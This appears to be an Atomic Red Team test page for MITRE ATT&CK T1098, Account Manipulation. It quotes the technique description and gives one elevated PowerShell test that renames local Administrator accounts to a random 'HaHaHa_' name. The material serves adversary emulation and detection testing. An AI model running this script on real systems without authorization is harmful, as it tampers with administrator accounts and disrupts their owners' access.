# T1098 - Account Manipulation
## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1098)
<blockquote>Account manipulation may aid adversaries in maintaining access to credentials and certain permission levels within an environment. Manipulation could consist of modifying permissions, modifying credentials, adding or changing permission groups, modifying account settings, or modifying how authentication is performed. These actions could also include account activity designed to subvert security policies, such as performing iterative password updates to subvert password duration policies and preserve the life of compromised credentials. In order to create or manipulate accounts, the adversary must already have sufficient permissions on systems or the domain.

### Exchange Email Account Takeover

The Add-MailboxPermission PowerShell cmdlet, available in on-premises Exchange and in the cloud-based service Office 365, adds permissions to a mailbox.(Citation: Microsoft - Add-MailboxPermission) This command can be run, given adequate permissions, to further access granted to certain user accounts. This may be used in persistent threat incidents as well as BEC (Business Email Compromise) incidents where an adversary can assign more access rights to the accounts they wish to compromise. This may further enable use of additional techniques for gaining access to systems. For example, compromised business accounts are often used to send messages to other accounts in the network of the target business while creating inbox rules so the messages evade spam/phishing detection mechanisms.(Citation: Bienstock, D. - Defending O365 - 2019)

### Azure AD

In Azure, an adversary can set a second password for Service Principals, facilitating persistence.(Citation: Blue Cloud of Death)

### AWS

AWS policies allow trust between accounts by simply identifying the account name. It is then up to the trusted account to only allow the correct roles to have access.(Citation: Summit Route Advanced AWS policy auditing)</blockquote>

## Atomic Tests

- [Atomic Test #1 - Admin Account Manipulate](#atomic-test-1---admin-account-manipulate)


<br/>

## Atomic Test #1 - Admin Account Manipulate
Manipulate Admin Account Name

**Supported Platforms:** Windows





#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
```
$x = Get-Random -Minimum 2 -Maximum 9999
$y = Get-Random -Minimum 2 -Maximum 9999
$z = Get-Random -Minimum 2 -Maximum 9999
$w = Get-Random -Minimum 2 -Maximum 9999
Write-Host HaHaHa_$x$y$z$w

$hostname = (Get-CIMInstance CIM_ComputerSystem).Name

$fmm = Get-CimInstance -ClassName win32_group -Filter "name = 'Administrators'" | Get-CimAssociatedInstance -Association win32_groupuser | Select Name

foreach($member in $fmm) {
    if($member -like "*Administrator*") {
        Rename-LocalUser -Name $member.Name -NewName "HaHaHa_$x$y$z$w"
        Write-Host "Successfully Renamed Administrator Account on" $hostname
        }
    }
```






<br/>
